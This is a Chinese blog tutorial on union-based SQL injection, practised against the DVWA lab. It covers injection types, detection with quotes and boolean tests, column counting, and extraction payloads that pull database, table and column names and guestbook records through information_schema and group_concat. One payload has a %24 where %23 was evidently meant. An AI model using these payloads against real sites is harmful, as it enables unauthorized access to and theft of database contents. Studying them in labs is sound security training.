SQL的联合查询注入学习

最新推荐文章于 2024-05-29 00:11:31 发布
最新推荐文章于 2024-05-29 00:11:31 发布
阅读量947 收藏 22
点赞数 17
文章标签: sql 学习 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80034711/article/details/136604343
版权
本文详细介绍了SQL注入的概念、产生原因、分类(根据位置、反馈和数据类型),以及检测方法,包括联合查询注入的实例分析。讲解了如何利用SQL特性判断是否存在注入漏洞和其类型。
摘要由CSDN通过智能技术生成

一、SQL注入的简单介绍

1、简介:

SQL是操作数据库数据的结构化查询语句,网页的应用数据和后台数据库中的数据进行交互时会采用SQL。

2、产生原因:

程序没有对用户输入数据的合法性进行验证和过滤,导致SQL查询语句被恶意拼接从而产生SQL注入。

3、原理:

攻击者可以在事先定义好的查询语句的结尾上添加额外的SQL语句,从而对数据库服务器执行非授权的任意查询,获得相应的数据信息。

4、分类:

根据注入位置分类:

①GET注入:注入点在URL中

②POST注入:注入点在POST提交的数据中

③Head头注入:注入点在请求头中

根据结果反馈分类:

①有回显注入(显错注入):执行语句后可以把具体内容反馈出来

②无回显注入(盲注):执行语句后不会把具体内容反馈出来

根据数据类型分类:

①字符型注入:输入参数为字符串,且必须用单引号进行闭合

②数字型注入:输入参数为整型,且不需要用单引号进行闭合

5、注入方法:

看测试语句是否被执行,如果被执行了则说明存在SQL注入漏洞。(可用'和''进行测试)

二、联合查询注入

1、判断是否存在注入:

利用单引号'或双引号"来判断是否存在漏洞 (SQL中引号是成双成对出现的)

假设后端的SQL语句为:

SELECT first_name, last_name FROM users WHERE user_id = '$id'

(注意后端中id值是自带引号的)

a.输入以下语句进行测试

SELECT first_name, last_name FROM users WHERE user_id = '1'

b.把数字1改成1'再进行测试

SELECT first_name, last_name FROM users WHERE user_id ='1''

 

可以发现此时多了一个引号就会进行报错了,由数据库的报错可以说明用户是可以对原来的查询语句进行修改,则表明存在漏洞。

2、 判断注入类型:

使用 1 and 1=1 、1 and 1=2 、1' and '1' = '1 、1' and '1' = '2 进行判断

a.输入1 and 1=1和1 and 1=2 发现页面均显示正常

 

b.尝试输入 1 ' and '1' = '1 和 1 ' and '1' = ' 2,发现前面可以显示出来,但是后面不可以

 

 说明单引号起作用了,可以得知为字符型注入

注:and前后必须同时为真结果才返回为真

这里就需要引入MYSQL的隐式类型转换知识:第一个数如果不是数字的话后面部分就全部舍弃

'1abcd'==>1

'abcd'==>0

'12abcd'==>12

'1abc2d'==>1

3、判断表中列数:

利用order by 数字 来判断表中的列数,如果大于所要查询的列数就会报错

a.输入1' order by 4# ,发现未知列数,则说明列数不为4

 

 

b. 输入1' order by 2# ,显示成功,说明列数为2列

值得注意的是,#在URL地址栏中会自动转化成 “%23”

所以如果在URL中输入1#2,则会显示1(即#不起作用);输入1%23 2,则会显示1#2

a.在URL中输入#

此时#不起作用,即多了一个单引号,但是并没有注释掉,所以页面报错

b.在URL中输入%23

可以发现此时#起了注释作用,所以可以成功访问

4、确定显示位:

服务端执行SQL语句查询数据,而客户端将数据展示在页面中,展示数据的位置就叫显示位。

UNION结果集中的列名等于UNION中第一个SELECT语句中的列名,UNION内部的SELECT语句必须拥有相同数量的列

a.输入1' union select 1,2%23时,发现1和2都显示了。

 

(我们一般不查询union左边的内容,所以让union左边的select子句查询为空,这样右边的查询结果就变成了第一行,所以可以将其id值改为负数或很大的数)

5、获取数据:

①获取数据库名:

输入-1' union select 1,database()%24

②获取数据库中表名:

输入-1' union select 1, table_name from information_schema.tables where table_schema='dvwa'%23

③获取表中字段名(列):

输入-1'union select 1,column_name from information_schema.columns where table_name='guestbook' and table_schema='dvwa'%23

④获取表中记录:

a.输入-1'union select 1,comment from guestbook%23

b.一行只能获取2个显示位,若要获取表中所有记录,则使用group_concat(),将多行合并成一行。

输入-1'union select 1,group_concat(comment_id,comment,name) from guestbook%23

 

(参考文章:蚁景网安学院)

 

live梨
关注
  • 17
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SQL注入联合查询
m0_56578216的博客
08-22 895
适用数据库中的内容会回显到页面中来的情况。联合查询就是利用union select 语句,该语句会同时执行两条select 语句,实现跨库、跨表查询。两条select 语句查询结果具有相同列数:对应的列数据类型相同(特殊情况下,条件被放松)。联合查询就是利用SQL语句中的union select语句同时执行两条select语句,实现跨表查询的方法。由于联合查询会将数据库中的两张表按照列数拼接(纵向拼接)后再进行查询,所以要求两条select语句查询的表必须******
sql联合查询注入
m0_65977612的博客
11-18 934
sql联合查询注入
SQL注入联合查询注入
qq_45691294的博客
07-11 7248
MySQL中的联合查询 联合查询是可合并多个相似的选择查询的结果集。等同于将一个表追加到另一个表,从而实现将两个表的查询组合在一起,使用为此为UNINO或UNION ALL 联合查询:将多个查询的结果合并到一起(纵向合并):字段数不变,多个查询的记录数合并 基本语法: select 语句 union[union选项] select 语句; 联合查询注入的条件 联合查询注入是MySQL注入中的一种方式,在SQL注入中说了注入漏洞存在的相关条件,而联合查询注入这种方法需要满足查询的信息在前端有回显,回显数据的
Web渗透-MySql-Sql注入联合查询注入
最新发布
WolvenSec的博客
05-29 1229
SQL注入SQL Injection)是一种网络攻击技术,攻击者通过将恶意的SQL代码插入到应用程序的输入字段,从而欺骗应用程序执行未经授权的操作。这种攻击方式可以导致严重的安全问题,包括:数据泄露:攻击者可以未经授权地访问和检索数据库中的敏感数据。数据篡改:攻击者可以修改、删除或添加数据库中的数据。身份冒充:攻击者可以冒充其他用户,包括管理员,从而获得更高的权限。拒绝服务:通过破坏数据库或使其负载过重,使得数据库无法正常提供服务。
sql注入详解
m0_67392811的博客
06-12 5770
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
SQL注入进阶:掌握联合查询注入和报错注入攻击技巧
weixin_43263566的博客
01-19 3212
SQL注入联合查询注入与报错注入
sql注入联合查询注入
qq_50953689的博客
05-04 1517
判断数据显示点 (id一定要改为0或负数) id=0' union select 1,2,3 主要作用:测试数据库表中的有效column是哪几列
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户...通过学习 SQL 注入基础知识、工具和环境搭建、MySQL 数据库基础知识、SQL 注入防御、SQL 注入类型和基本步骤,我们可以更好地理解和防御 SQL 注入攻击。
SQL注入天书 sqli-labs
01-11
4. **联合查询注入**:利用UNION操作符合并两个或多个查询,以显示非预期的结果。 5. **堆叠查询注入**:通过构造多条查询语句并用分号分隔,一次性执行多个查询。 6. **信息收集**:学习如何获取数据库版本、表名...
sql注入靶场.zip
06-24
它模拟了各种类型的SQL注入漏洞,包括但不限于错误基线注入、时间基线注入、盲注、联合查询注入、堆叠查询注入等。每个挑战都设计有特定的注入点,需要利用这些点来获取敏感信息,例如数据库中的用户名、密码或其他...
易语言SQL注入
07-20
在提供的"易语言SQL注入源码"中,可以学习如何编写安全的SQL查询,如何避免直接拼接SQL字符串,以及如何检测和修复已存在的注入漏洞。源码可能会包含示例,展示如何正确处理用户输入,防止注入攻击。 4. **常见SQL...
SQL注入技巧-盲注暴库详细技巧及实例
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的盲注技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
sql注入学习高级篇
12-16
SQL注入学习高级篇】 SQL注入是一种常见的网络安全漏洞,攻击者通过输入恶意的SQL代码,欺骗服务器执行非授权的操作,从而获取敏感信息或控制数据库。本篇主要探讨SQL注入的高级技巧,包括针对SQLServer数据库的...
SQL注入系列篇之union联合注入
d59hao的博客
04-27 701
union注入攻击,通过union或union all连接,将自己写的SQL拼接到原始SQL中,从而达到执行任意SQL语句的效果。
SQL注入之union 联合注入
weixin_53711701的博客
01-16 4329
SQL注入之union联合注入
网络安全——基于联合查询的字符型GET注入
weixin_54055099的博客
09-08 599
SQL注入之基于联合查询的字符GET注入
SQL注入——基于联合查询的字符型GET注入(三)
Gjqhs的博客
02-16 744
本章目的 普及字符型GET注入的原理和特点,掌握利用联合查询(unionselect)的方法 实现SQL注入的基本流程。 实验环境 攻击机:Pentest-Atk (1)操作系统:Windows10 (2)安装的应用软件:Sqlmap、Burpsuite、FireFox浏览器插件Hackbar、 FoxyProxy等 (3)登录账号密码:操作系统帐号Administrator,密码Sangfor!7890 靶机:A-SQLi-Labs (1)操作系统:Centos7 (2)安装的应用软件:Apache、M
MySQL联合注入之字符型注入
m0_50211409的博客
03-27 1722
关于字符型注入 首先我们都知道,在数据库中字符串都是被单引号与双引号包裹起来的。 我们分析一下字符型注入SQL语句 select*from admin where id='1' 这是字符型注入后的语句 我们在传参的时候 ...
sql注入联合查询
笔墨稠思
07-07 1014
本次注入采用DVWA作为靶场,数据库采取mysql 首先我们设置一下dvwa的安全等级 修改等级后点击submit按钮,之后我们进入sql注入的实战靶场 联合查询注入,我们需要用到 union 来连接两条sql语句 一.判断注入类型 他给了我们一个form表单,让我们提交一个user ID进去,这个注入点很明确,肯定是我们输入进去的id了,id一般都是int 类型的,但也有可能是字符串类型的 那数据库的查询语句可能是 select * from 表 where id = $user_id 也可能是
关于SQL注入学习方式
05-26
学习SQL注入可以从以下几个方面入手: 1. 学习基础的SQL语法和数据库知识,了解常见的数据库类型、表、列、数据类型等概念。 2. 了解SQL注入的原理和分类,包括手动注入和自动化工具注入,以及盲注、联合查询注入、报错注入等不同类型的注入方式。 3. 学习如何使用工具进行SQL注入测试,如SQLMap、Burp Suite等,掌握工具的使用方法和一些基本配置。 4. 学习如何防止SQL注入,包括使用参数化查询、过滤输入、使用ORM框架等方法。 5. 实践漏洞挖掘和修复,可以通过CTF比赛、漏洞挖掘赛事、实际的渗透测试等方式,提高自己的实际操作能力和经验。 总之,SQL注入是一个复杂而且危险的安全漏洞,需要我们不断学习和实践,才能提高自己的安全意识和技术水平,更好地保护自己和他人的信息安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值